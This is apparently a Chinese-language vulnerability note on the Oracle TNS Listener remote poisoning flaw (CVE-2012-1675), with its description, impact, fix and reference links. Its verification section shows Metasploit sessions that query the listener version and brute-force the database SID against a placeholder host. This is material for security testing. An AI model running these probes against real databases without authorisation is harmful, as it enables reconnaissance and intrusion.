Oracle TNS Listener Remote Poisoning
遠程數據投毒漏洞(CVE-2012-1675)
1、漏洞簡介:
允許攻擊者在不提供用戶名/密碼的情況下,向遠程“TNS Listener”組件處理的數據投毒的漏洞。
COST 是class of secure transports 的縮寫。是為了控制實例注冊提供的一種安全控制機制。其作用是對於一個確定的listener,限制哪些實例通過哪些協議可以進行注冊。這將避免有其他遠程實例進行惡意注冊,並由此產生信息泄露等風險。
它通過在 listner.ora中設置參數SECURE_REGISTER_listener_name的值,指定為一個transport list(限定的注冊協議列表,如IPC、TCP、TCPS)來實現這一功能。 該功能從 10.2.0.3 版本開始支持(雖然10g R2的在線文檔中並未明確說明),一直到11.2.0.4版本及之后依然可用。但是,在11.2.0.4后,oracle建議使用默認的VNCR配置。
2、漏洞危害:
攻擊者可以在不需要用戶名密碼的情況下利用網絡中傳送的數據消息(包括加密或者非加密的數據),如果結合(CVE-2012-3137漏洞進行密碼破解)從而進一步影響甚至控制局域網內的任何一台數據庫。
3、漏洞驗證:
msf:
use auxiliary/admin/oracle/tnscmd
use auxiliary/admin/oracle/sid_brute
tnscmd——該漏洞可以遠程獲取到oracle的內存信息,若是能獲取到內存中的數據即為存在漏洞。
sid_brute——爆破oracle的SID
msf > use auxiliary/admin/oracle/tnscmd
msf auxiliary(tnscmd) > info
Name: Oracle TNS Listener Command Issuer
Module: auxiliary/admin/oracle/tnscmd
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2009-02-01
Provided by:
MC <mc@metasploit.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
CMD (CONNECT_DATA=(COMMAND=VERSION)) no Something like ping, version, status, etc..
RHOST yes The target address
RPORT 1521 yes The target port (TCP)
Description:
This module allows for the sending of arbitrary TNS commands in
order to gather information. Inspired from tnscmd.pl from
www.jammed.com/~jwa/hacks/security/tnscmd/tnscmd
msf auxiliary(tnscmd) > set RHOST www.xxxx.cc
RHOST => www.xxxx.cc
msf auxiliary(tnscmd) > show options
Module options (auxiliary/admin/oracle/tnscmd):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD (CONNECT_DATA=(COMMAND=VERSION)) no Something like ping, version, status, etc..
RHOST www.xxxx.cc yes The target address
RPORT 1521 yes The target port (TCP)
msf auxiliary(tnscmd) > run
[*] www.xxxx.cc:1521 - Sending '(CONNECT_DATA=(COMMAND=VERSION))' to www.xxxx.cc:1521
[*] www.xxxx.cc:1521 - writing 90 bytes.
[*] www.xxxx.cc:1521 - reading
[*] www.xxxx.cc:1521 - .M.......6.........-. ..........(DESCRIPTION=(TMP=)(VSNNUM=169869568)(ERR=0)).\........TNSLSNR for Linux: Version 10.2.0.1.0 - Production..TNS for Linux: Version 10.2.0.1.0 - Production..Unix Domain Socket IPC NT Protocol Adaptor for Linux: Version 10.2.0.1.0 - Production..Oracle Bequeath NT Protocol Adapter for Linux: Version 10.2.0.1.0 - Production..TCP/IP NT Protocol Adapter for Linux: Version 10.2.0.1.0 - Production,,.........@
[*] Auxiliary module execution completed
msf auxiliary(tnscmd) > use auxiliary/admin/oracle/sid_brute
msf auxiliary(sid_brute) > show options
Module options (auxiliary/admin/oracle/sid_brute):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 1521 yes The target port (TCP)
SIDFILE /usr/share/metasploit-framework/data/wordlists/sid.txt no The file that contains a list of sids.
SLEEP 1 no Sleep() amount between each request.
msf auxiliary(sid_brute) > set RHOST www.xxxx.cc
RHOST => www.xxxx.cc
msf auxiliary(sid_brute) > show options
Module options (auxiliary/admin/oracle/sid_brute):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST www.xxxx.cc yes The target address
RPORT 1521 yes The target port (TCP)
SIDFILE /usr/share/metasploit-framework/data/wordlists/sid.txt no The file that contains a list of sids.
SLEEP 1 no Sleep() amount between each request.
msf auxiliary(sid_brute) > run
[*] www.xxxx.cc:1521 - Starting brute force on www.xxxx.cc, using sids from /usr/share/metasploit-framework/data/wordlists/sid.txt...
[+] www.xxxx.cc:1521 - www.xxxx.cc:1521 Found SID 'ORCL'
[*] www.xxxx.cc:1521 - Done with brute force...
[*] Auxiliary module execution completed
msf auxiliary(sid_brute) >
使用Nessus掃描
4、漏洞修復
更新升級最新的oracle。
參考:
https://www.cnblogs.com/chendeming/p/9087493.html
https://blog.csdn.net/archersaber39/article/details/78932530
http://www.freebuf.com/articles/database/54289.html